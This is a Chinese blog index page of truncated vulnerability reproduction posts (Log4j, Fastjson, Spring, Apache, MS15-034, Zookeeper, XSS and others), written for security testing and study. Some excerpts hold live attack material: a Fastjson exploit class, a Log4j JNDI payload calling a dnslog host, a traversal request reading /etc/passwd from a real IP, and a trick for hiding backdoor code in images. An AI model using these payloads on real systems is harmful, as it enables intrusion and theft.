漏洞验证及复现
文章平均质量分 61
漏洞验证及漏洞复现
李白你好
谢谢你的喜欢
展开
-
用友OA漏洞复现手册
https://blog.csdn.net/qq_41617034/article/details/124268004转载 2022-06-09 12:37:25 · 6265 阅读 · 1 评论 -
Microsoft Remote Procedure Call Runtime 远程代码执行漏洞(CVE-2022-26809)
CVE-2022-26809 RCECVE 描述CVE-2022-26809 - 核心 Windows 组件 (RPC) 的弱点获得 9.8 的 CVSS 分数并非没有原因,因为攻击不需要身份验证并且可以通过网络远程执行,并且可能导致远程代码执行 ( RCE) 具有 RPC 服务的权限,这取决于托管 RPC 运行时的进程。运气好的话,这个严重的错误允许访问运行 SMB 的未打补丁的 Windows 主机。该漏洞既可以从网络外部被利用以破坏它,也可以在网络中的机器之间被利用。https://msrc原创 2022-05-12 09:55:36 · 6290 阅读 · 0 评论 -
CVE-2022-1388——F5 BIG-IP iControl REST 身份认证绕过漏洞
漏洞描述BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。CVE-2022-1388未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。漏洞危害该漏洞CVSS评分:9.8危害等级:严重影响范围11.6.1 - 11..原创 2022-05-06 10:15:07 · 7389 阅读 · 3 评论 -
CVE-2021-40904——CheckMk后台RCE
CVE-2021-40904漏洞描述CheckMk Raw Edition(版本 1.5.0 到 1.5.0p25)的 Web 管理控制台允许错误配置允许嵌入 php 代码的 Web 应用程序 Dokuwiki(默认安装)。结果,实现了远程代码执行。成功的利用需要使用有效凭据或具有管理员角色的用户劫持会话来访问 Web 管理界面。影响版本从 1.5.0 到 1.5.0p25攻击类型RCE解决方案升级到 1.6 或更高版本时间线2021-09-01 发现问题。2021-09-06 第原创 2022-04-10 13:58:21 · 19333 阅读 · 0 评论 -
CVE-2022-22963-Spring-Core-RCE图形化利用工具
CVE-2022-22963描述:Spring4Shell - Spring Core RCE - CVE-2022-22965链接:https://github.com/TheGejr/SpringShell描述:Spring4Shell Proof Of Concept/Information CVE-2022-22965链接:https://github.com/BobTheShoplifter/Spring4Shell-POC描述:This includes CVE-2022-22原创 2022-04-01 16:40:12 · 9997 阅读 · 0 评论 -
Spring-Cloud-Gateway-CVE-2022-22947
漏洞描述Spring Cloud Gateway远程代码执行漏洞的安全公告。该漏洞为当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。影响版本Spring Cloud Gateway < 3.1.1 Spring Cloud Gateway < 3.0.7 Spring Cloud Gateway 旧的、不受支持.原创 2022-03-04 10:53:16 · 19557 阅读 · 0 评论 -
Fastjson小于1.2.68全漏洞RCE利用exp
jsonExploit.javapublic class Exploit{ public Exploit() {} static { try { String[] cmds = System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"cmd.exe","/c", "calc.exe"} ..原创 2022-03-01 21:07:03 · 19948 阅读 · 1 评论 -
SpringBoot eureka xstream deserialization RCE
利用条件可以 POST 请求目标网站的 /env 接口设置属性可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)目标使用的 eureka-client < 1.8.7(通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中)目标可以请求攻击者的 HTTP 服务器(请求可出外网)利用方法步骤一:架设响应恶意 XStream payload 的网站提供一原创 2022-03-01 20:37:00 · 3710 阅读 · 0 评论 -
CVE-2022-23131——绕过 SAML SSO 身份验证
漏洞描述安全断言标记语言 (SAML) 是最常见的单点登录 (SSO) 标准之一。围绕 XML 实现,它允许身份提供者(IdP,一个能够对用户进行身份验证的实体)告诉服务提供者(SP,这里是 Zabbix)你是谁。您可以将Zabbix Web 前端配置为允许通过 SAML 进行用户身份验证,但默认情况下不启用它,因为它需要了解身份提供者的详细信息。这是企业部署最常见的设置。在启用 SAML SSO 身份验证的实例上,它允许绕过身份验证并获得管理员权限。攻击者可以使用此访问权限在链接的Zabbix Ser原创 2022-02-19 09:36:24 · 76699 阅读 · 1 评论 -
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shellVuofocushttp://vulfocus.fofa.so/启动靶场Dnslog出网测试http://www.dnslog.cn/payload GET方式提交payloadpayload=${jndi:ldap://X.X.X.X/exp}payload=${jndi:ldap://5e0s0v.dnslog.cn/exp}用payload打的时候发现服务器返回404原因是因为GET数据传输原创 2022-01-05 10:12:15 · 29789 阅读 · 14 评论 -
CVE-2021-43798——Grafana 未授权任意文件读取
Grafana 未授权任意文件读取~原创 2021-12-18 09:57:47 · 10899 阅读 · 7 评论 -
Log4j 远程代码执行漏洞检测
Log4j 远程代码执行漏洞检测~原创 2021-12-14 17:58:21 · 10643 阅读 · 17 评论 -
Apache Log4j 远程代码执行漏洞直接让安全圈过年~
Apache Log4j 远程代码执行漏洞修复方案原创 2021-12-10 10:38:04 · 2712 阅读 · 8 评论 -
CNVD-2021-49104——泛微E-Office文件上传漏洞
CNVD-2021-49104漏洞描述危害等级FOFA 语法影响版本漏洞复现修复建议漏洞描述泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。危害等级高危文件上传可直接get webshellFOFA 语法app="泛微-EOffice"影响版本泛微e-office V9.0漏洞复现构造请求上传文件即可POST /general/index/U原创 2021-11-28 11:27:18 · 8839 阅读 · 4 评论 -
CVE-2021-36749——Apache Druid LoadData 任意文件读取漏洞
CVE-2021-36749漏洞原理影响版本fofa语法漏洞测试POC修复方法漏洞原理由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证,攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。影响版本Apache Druid Version < 0.22fofa语法title="Apache原创 2021-11-26 15:03:36 · 13395 阅读 · 10 评论 -
Hadoop Yarn RPC未授权访问漏洞
Hadoop Yarn RPC未授权访问漏洞???? 漏洞详情????影响版本???? 复现环境????FOFA语法????漏洞利用????漏洞修复???? 漏洞详情Apache Hadoop YARN (Yet Another Resource Negotiator)是一种新的 Hadoop 资源管理器,它是一个通用资源管理系统,可为上层应用提供统一的资源管理和调度,它的引入为集群在利用率、资源统一管理和数据共享等方面带来了巨大好处。Hadoop Yarn默认对外开放RPC服务,攻击者可利用RPC原创 2021-11-22 11:13:35 · 14737 阅读 · 13 评论 -
CVE-2021-41277——Metabase 信息泄露漏洞
Metabase 信息泄露漏洞漏洞简介FOFA语法EXP漏洞测试漏洞修复漏洞简介Metabase是美国Metabase公司的一个开源数据分析平台。Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。CNNVD编号:CNNVD-202111-1565危害等级: 超危CVE编号: CVE-2021-41277FOFA语法app="Metabase原创 2021-11-21 12:10:25 · 10828 阅读 · 2 评论 -
CVE-2021-40116|CVE-2021-34783等——Cicso多个安全漏洞
漏洞复现漏洞概述影响版本漏洞复现漏洞详情处置建议漏洞概述2021年10月27日,Cisco发布安全公告,修复了Cisco Firepower 威胁防御 (FTD)、Cisco思科自适应安全设备 (ASA)和Firepower 管理中心 (FMC)中的多个安全漏洞。CISCO ASA远程任意文件读取Cisco Adaptive Security Appliance (ASA)是思科的一种防火墙设备。Cisco Adaptive Security Appliance (ASA)防火墙设备以及Ci原创 2021-11-14 11:15:27 · 6961 阅读 · 9 评论 -
CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行
https://66.175.213.123/etc/passwd请求包GEThttps://66.175.213.123//icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1Host: 66.175.213.123User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,applica原创 2021-11-13 14:04:18 · 8951 阅读 · 9 评论 -
CVE-2021-22205——Gitlab 远程命令执行漏洞复现
CVE-2021-22205Vuln Impact影响版本环境Fofa语法漏洞利用脚本反弹ShellEXPVuln ImpactAn issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a .原创 2021-11-10 17:26:45 · 9407 阅读 · 14 评论 -
Javascript框架库漏洞验证
Javascript框架库漏洞????前言????漏洞验证????漏洞描述????解决办法????免费福利????前言经常看到漏扫扫出来这个漏洞,查看了网上好多文章都没有正确的验证方法都在扯淡。今天我来点干货记录一下这个漏洞到底是怎么触发JS生成XSS的,也方便后面漏洞验证报告的书写。AWVS扫出来的JS框架库漏洞RSAS扫出来的JS框架库漏洞????漏洞验证根据检测到目标站点存在javascript框架库漏洞原理,通过获取javascript框架库版本并查看该版本是否在受影响范围内进行漏洞原创 2021-10-22 14:41:29 · 17382 阅读 · 22 评论 -
KindEditor 文件上传漏洞验证
KindEditor 文件上传漏洞漏洞描述影响范围漏洞验证1.查看版本信息2.漏洞验证漏洞修复漏洞描述漏洞存在于KindEditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中。这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm原创 2021-09-30 09:51:14 · 2566 阅读 · 3 评论 -
SSL/TLS 存在Bar Mitzvah Attack漏洞
详细描述该漏洞是由功能较弱而且已经过时的RC4加密算法中一个问题所导致的。它能够在某些情况下泄露SSL/TLS加密流量中的密文,从而将账户用户名密码、信用卡数据和其他敏感信息泄露给黑客。解决办法1、服务器端禁止使用RC4加密算法。2、客户端应在浏览器TLS配置中禁止RC4。验证方法根据SSL/TLS 存在Bar Mitzvah Attack漏洞原理,通过跟目标站点进行SSL握手并根据目标站点返回的Server Hello消息中的加密算法进行漏洞验证。状态检测https://myssl.com原创 2021-09-28 08:58:54 · 7423 阅读 · 9 评论 -
PHPInfo()信息泄漏——综合利用提权
PHPInfo()信息泄漏在渗透测试中算是低危漏洞,但怎么进一步利用呢?我自己也稀里糊涂就觉得离谱。这种情况在漏洞扫描及渗透测试中经常遇到就是不知道怎么利用,找了网上很多文章都感觉说的不清不楚,自己没怎么看明白。今天我自己就总结一下。综合利用这些信息泄露配合一些其它漏洞将有可能导致系统被渗透和提权。查看phpinfo函数暴露出来的有用信息1、查看操作系统为Windows还是Linux2、查看服务器类型并按照类型和版本查找已经爆出来的漏洞综合利用3、查看网站默认路径:D:/WWW 通过mssq原创 2021-09-25 16:58:07 · 5305 阅读 · 2 评论 -
服务器存在缓慢的HTTP拒绝服务攻击
详细描述缓慢的HTTP拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量HTTP请求攻击,直到服务器带宽被打满,造成了拒绝服务。慢速HTTP拒绝服务攻击经过不断的演变和发展,主要有三种攻击类型,分别是Slow headers、Slow body、Slow read。以Slow headers为例,Web应用在处理HTTP请求之前都要先接收完所有的HTTP头部,因为HTTP头部中包含了一些Web应用可能用到的重要的信息。攻击者利用这点,发起一个HTT原创 2021-08-23 09:14:30 · 23243 阅读 · 114 评论 -
MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞 (漏洞验证)
以下内容并非在靶场,是在真实环境进行漏洞验证。1️⃣漏洞测试使用curl工具进行测试,测试命令:curl http://1.1.1.1 -H "Host: 1.1.1.1" -H "Range: bytes=0-18446744073709551615"2️⃣漏洞验证????利用ms15-034漏洞读取服务器内存数据借助metasploit平台:use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 1.原创 2021-08-18 14:25:13 · 8871 阅读 · 57 评论 -
Microsoft Windows MHTML脚本代码注入漏洞 (MS11-026) (CVE-2011-0096)
漏洞测试详细描述Microsoft Windows是微软发布的非常流行的操作系统。Microsoft Windows使用MHTML时存在安全漏洞,远程攻击者可利用此漏洞将任意脚本代码注入到当前浏览器会话,获取敏感信息,欺骗内容或在目标网站执行任意操作。此漏洞源于MHTML解释MIME格式请求文档中内容块的方式。在某些情况下,此漏洞可能会允许攻击者在运行在受害者IE中的Web请求的响应中注入客户端脚本。该脚本可欺骗内容、泄露信息或以目标用户身份在受影响站点进行攻击。解决办法服务器端过滤参数中的原创 2021-08-15 21:18:32 · 6963 阅读 · 82 评论 -
七夕咱一起验证漏洞✨ IIS7/7.5对文件名畸形解析导致远程代码执行❤️
漏洞复现http://www.xxx.cn/statics/ghx/css/default1219.css/xx.phpIIS 7/7.5在Fast-CGI运行模式下,如果在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。利用方法将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾e.g. copy xx.jpg/b + yy.txt/a xy.jpg################原创 2021-08-14 11:43:48 · 5238 阅读 · 69 评论 -
目标Zookeeper未授权访问(漏洞验证)
漏洞验证????漏洞复现????漏洞描述????解决办法????验证方法????漏洞复现echo envi | nc 1.1.1.1 2181????漏洞描述ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过原创 2021-08-06 10:12:04 · 8922 阅读 · 22 评论 -
目标URL存在跨站漏洞
URL存在跨站漏洞漏洞复现漏洞描述解决方法对于开发对于安全操作对于质量保证漏洞复现记录学习中遇到的问题该页面存在反射型XSSpayloadcity=null&account=null&password=null&dataValue="><script>alert`6538`</script>验证漏洞描述跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点原创 2021-07-30 10:02:03 · 9335 阅读 · 11 评论 -
目标URL存在http host头攻击漏洞
????漏洞描述为了方便的获得网站域名,开发人员一般依赖于HTTP Host header。例如,在php里用_SERVER[“HTTP_HOST”]。但是这个header是不可信赖的,如果应用程序没有对host header值进行处理,就有可能造成恶意代码的传入。????解决办法web应用程序应该使用SERVER_NAME而不是host header。在Apache和Nginx里可以通过设置一个虚拟机来记录所有的非法host header。在Nginx里还可以通过指定一个SERVER_NAME名单原创 2021-08-01 18:39:55 · 5367 阅读 · 4 评论 -
网页源代码隐藏域中存在密码
会话变量泄漏漏洞描述:登录、验证等页面的隐藏域中存在密码信息。测试方法:查看网页源代码,寻找隐藏域中是否存在密码等信息。风险分析:攻击者通过在局域网中嗅探网络流量,获取明文传输的认证凭证,如用户名密码。风险等级:【高危】:隐藏域中存在密码等信息修复方案:禁止在前端页面中保存密码等敏感信息。html中隐藏域hidden隐藏域在页面中对于用户是不可见的,在表单中插入隐藏域的目的在于收集或发送信息,以利于被处理表单的程序所使用。基本语法: ...原创 2021-08-03 16:56:05 · 14552 阅读 · 2 评论